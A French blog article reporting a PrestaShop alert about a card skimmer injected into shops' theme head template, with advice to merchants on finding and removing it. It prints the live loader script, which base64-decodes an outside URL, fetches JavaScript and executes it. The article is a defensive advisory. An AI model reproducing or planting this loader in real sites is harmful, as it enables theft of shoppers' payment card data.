Alerte sécurité PrestaShop : un malware vole les données de paiement de certaines boutiques

Alerte sécurité PrestaShop
Alerte sécurité PrestaShop

L’alerte vient de tomber chez PrestaShop. Ce qu’ils viennent de détecter, c’est un digital skimmer inséré dans le cœur même de certaines boutiques. Le code malveillant est injecté directement dans le fichier _partials/head.tpl du thème actif. Autrement dit, dans une zone critique du front.

Le script utilisé ressemble à ceci :

<script>(function(){
  var x = new XMLHttpRequest;
  x.open('GET', atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));
  x.onload = function(){
    if (200 === x.status) try { Function(x.responseText)(); } catch(e){}
  };
  x.send();
})();</script>

Ceux qui connaissent un peu le front-end repèrent vite le procédé. Une requête vers une URL base64, un code récupéré à distance, exécuté localement. Aucun chargement visible, pas d’appel à un module tiers, juste une balise discrète, glissée dans un fichier que peu de commerçants vont inspecter spontanément.

Ce que voient les clients ? Rien. Jusqu’à ce qu’ils saisissent leur carte bleue

Le scénario repose sur une illusion visuelle. Le client accède à la page de paiement, pense valider sa commande, clique, et tombe sur un formulaire imitant parfaitement celui du prestataire réel. Il saisit ses données bancaires, soumet… et croit avoir payé. Il n’a fait que transmettre ses informations à un serveur distant contrôlé par les attaquants.

Pas d’erreur. Pas d’indice. Le faux formulaire est suffisamment soigné pour passer inaperçu. Et tant que la boutique reste fonctionnelle, le commerçant ne s’alarme pas. Sauf si des clients commencent à signaler des débits suspects.

À lire aussi : Immatriculation INSEE : c’est quoi exactement ?

PrestaShop n’a pas attendu pour réagir : l’alerte est déjà dans les boîtes mail

PrestaShop n’a pas attendu pour réagir
Mail envoyé par PrestaShop

Dans la matinée, un email signé PrestaShop a été envoyé à de nombreux marchands utilisant la solution. L’entreprise y décrit précisément le fonctionnement de l’attaque, le fichier concerné, et le code à identifier. Le message inclut même un extrait du script à rechercher.

Le fait que le script soit directement injecté dans le thème actif signifie que l’attaquant a réussi à modifier un fichier à la racine du système. Ce n’est pas une faille banale. C’est une alerte rouge.

Ce type d’injection suppose un accès réel au serveur

La nature de l’attaque soulève plusieurs interrogations. Pour modifier le fichier du thème, il faut un accès au FTP ou au back-office PrestaShop. L’infection ne peut pas être le fruit d’un simple crawl automatisé. Elle implique une compromission en amont, via une faille serveur, un plugin vulnérable ou un compte compromis.

La charge utile, stockée en base64 dans l’appel atob(), varie selon les boutiques, ce qui laisse penser à une adaptation à chaque environnement. Les boutiques les plus visées semblent être celles avec des thèmes customisés ou des hébergements mutualisés peu surveillés.

Le code, lui, est minimaliste. Pas de complexité apparente. Un script qui se déclenche dès le chargement, exécute ce qu’il récupère, puis s’efface dans le flot habituel du DOM.

Le plus grave n’est pas le code, mais le silence autour

PrestaShop a publié une alerte claire, sans euphémisme. Ils recommandent aux utilisateurs de vérifier manuellement le fichier _partials/head.tpl, et de supprimer tout code suspect, en particulier les balises <script> contenant des appels à atob() ou des requêtes extérieures. Les équipes techniques mènent encore l’enquête, mais il n’y a pas de correctif automatique.

Cette situation oblige chaque propriétaire de boutique à auditer son code. Non pas via un plugin ou une extension de sécurité, mais en ouvrant les fichiers un par un, à la main. Un travail chronophage, mais indispensable.

Il reste une question en suspens : combien de boutiques ont été modifiées sans le savoir. La faille n’est pas due à PrestaShop lui-même, mais à l’écosystème dans lequel il évolue. Modules, hébergeurs, accès mal sécurisés. Tout ce qui gravite autour de la boutique peut devenir une faille. La preuve est dans ce script.

Partager cet article
Suivre :
Nathan Augan a suivi un parcours dans la web/com, puis s’est formé au SEO et au marketing digital. Curieux et très orienté test, il aime comparer des outils, optimiser des pages et chercher la version la plus efficace. Sur Agence404, il partage ses découvertes, ses tests et ses méthodes.
Aucun commentaire

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *